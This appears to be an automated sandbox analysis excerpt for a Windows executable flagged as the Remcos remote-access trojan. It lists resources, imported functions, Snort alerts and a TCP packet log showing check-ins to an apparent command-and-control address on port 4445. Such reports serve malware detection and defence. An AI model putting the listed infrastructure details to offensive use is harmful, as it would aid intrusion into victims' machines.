                                                                                                                                                                                        .rsrc0x1110000x2d6000x2d600606177ff6643c04b3c3ff06504b3b48bFalse0.08350550964187328data3.2906157676378043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                        RT_CURSOR0x111b780x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                        RT_CURSOR0x111cac0x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                                        RT_CURSOR0x111de00x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                                        RT_CURSOR0x111f140x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                                        RT_CURSOR0x1120480x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                                        RT_CURSOR0x11217c0x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                                        RT_CURSOR0x1122b00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                        RT_BITMAP0x1123e40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                        RT_BITMAP0x1125b40x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                                                                        RT_BITMAP0x1127980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                                                                        RT_BITMAP0x1129680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                                                                        RT_BITMAP0x112b380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                                                                        RT_BITMAP0x112d080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                                                        RT_BITMAP0x112ed80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                                                                        RT_BITMAP0x1130a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                        RT_BITMAP0x1132780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                                                                        RT_BITMAP0x1134480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                                                                        RT_BITMAP0x1136180xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                                                                        RT_ICON0x1137000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.12922138836772984
                                                                                                                                                                                        RT_ICON0x1147a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.09056016597510373
                                                                                                                                                                                        RT_ICON0x116d500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.05886868209730751
                                                                                                                                                                                        RT_ICON0x11af780x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m0.05605263157894737
                                                                                                                                                                                        RT_ICON0x1217600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.045590708429682575
                                                                                                                                                                                        RT_ICON0x12ac080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.036983911037501475
                                                                                                                                                                                        RT_DIALOG0x13b4300x52data0.7682926829268293
                                                                                                                                                                                        RT_DIALOG0x13b4840x52data0.7560975609756098
                                                                                                                                                                                        RT_STRING0x13b4d80x110data0.5845588235294118
                                                                                                                                                                                        RT_STRING0x13b5e80x224data0.5145985401459854
                                                                                                                                                                                        RT_STRING0x13b80c0xc8data0.665
                                                                                                                                                                                        RT_STRING0x13b8d40xe8data0.6637931034482759
                                                                                                                                                                                        RT_STRING0x13b9bc0x3ccdata0.4125514403292181
                                                                                                                                                                                        RT_STRING0x13bd880x3a8data0.36538461538461536
                                                                                                                                                                                        RT_STRING0x13c1300x394data0.3941048034934498
                                                                                                                                                                                        RT_STRING0x13c4c40x3f8data0.37598425196850394
                                                                                                                                                                                        RT_STRING0x13c8bc0xf4data0.5532786885245902
                                                                                                                                                                                        RT_STRING0x13c9b00xc4data0.6275510204081632
                                                                                                                                                                                        RT_STRING0x13ca740x22cdata0.5017985611510791
                                                                                                                                                                                        RT_STRING0x13cca00x3b4data0.3227848101265823
                                                                                                                                                                                        RT_STRING0x13d0540x368data0.37844036697247707
                                                                                                                                                                                        RT_STRING0x13d3bc0x2b8data0.3879310344827586
                                                                                                                                                                                        RT_RCDATA0x13d6740x10data1.5
                                                                                                                                                                                        RT_RCDATA0x13d6840x2a4data0.7381656804733728
                                                                                                                                                                                        RT_RCDATA0x13d9280xb66Delphi compiled form 'TForm1'0.3971898560657985
                                                                                                                                                                                        RT_GROUP_CURSOR0x13e4900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                        RT_GROUP_CURSOR0x13e4a40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                        RT_GROUP_CURSOR0x13e4b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                        RT_GROUP_CURSOR0x13e4cc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                        RT_GROUP_CURSOR0x13e4e00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                        RT_GROUP_CURSOR0x13e4f40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                        RT_GROUP_CURSOR0x13e5080x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                        RT_GROUP_ICON0x13e51c0x5adata0.8111111111111111

                                                                                                                                                                                        Imports

                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                                        user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                                                                        kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                                                                        kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                                                                        kernel32.dllSleep
                                                                                                                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                                        comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                        uRLURLAssociationDialogA

                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                        03/28/24-13:59:15.069542TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        03/28/24-14:01:41.205303TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response444549708192.3.109.132192.168.2.7

                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Mar 28, 2024 13:58:58.568214893 CET49699443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.568255901 CET4434969913.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:58.568331957 CET49699443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.569809914 CET49699443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.569854021 CET4434969913.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:58.569900036 CET49699443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.648184061 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.648232937 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:58.648298979 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.651829004 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.651844978 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:58.985279083 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:58.985358000 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.987925053 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:58.987937927 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:58.988179922 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:59.037343025 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:59.052023888 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:59.096240997 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:59.335716963 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:59.335866928 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:58:59.335962057 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:59.338146925 CET49700443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:58:59.338167906 CET4434970013.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:00.685031891 CET49702443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:00.685086966 CET4434970213.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:00.685189962 CET49702443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:00.685513973 CET49702443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:00.685570955 CET4434970213.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:00.685628891 CET49702443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:00.736732960 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:00.736782074 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:00.736864090 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:00.737158060 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:00.737173080 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.044385910 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.044492960 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.119966984 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.119990110 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.120362043 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.121575117 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.168235064 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547041893 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547131062 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547250032 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547375917 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547375917 CET49703443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547399998 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:01.547440052 CET4434970313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819756985 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819783926 CET4434970513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819860935 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819921017 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.819991112 CET4434970513.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.820043087 CET49705443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853024006 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853066921 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853147030 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853504896 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:02.853532076 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.161462069 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.161571026 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.162857056 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.162867069 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.163124084 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.164283991 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.212233067 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.431737900 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.431823015 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.431879997 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432012081 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432029009 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432037115 CET49706443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:03.432041883 CET4434970613.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:14.904962063 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.068303108 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.068404913 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.069541931 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.269639015 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.628453970 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.631772995 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.791851044 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.809119940 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.869476080 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.969082117 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:15.969269991 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:15.969315052 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133673906 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133702993 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133719921 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133737087 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133752108 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133796930 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133811951 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133814096 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133827925 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133841991 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133857012 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133865118 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133865118 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.133935928 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.255438089 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294548035 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294672012 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294688940 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294708014 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294727087 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294758081 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294780970 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294850111 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294889927 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294948101 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.294950008 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295018911 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295068979 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295085907 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295130014 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295156956 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295203924 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295258045 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295274973 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295356989 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295378923 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295416117 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295444965 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295511007 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295541048 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295583963 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295639038 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295650005 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295694113 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.295775890 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.434125900 CET8049712178.237.33.50192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.434206963 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 13:59:16.440784931 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454711914 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454751968 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454790115 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454804897 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454833031 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454862118 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454885006 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454888105 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454899073 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454914093 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454929113 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454967022 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454977989 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454977989 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.454982042 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.455010891 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.455010891 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.455058098 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.455060959 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.455086946 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.455101013 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.455125093 CET444549711192.3.109.132192.168.2.7
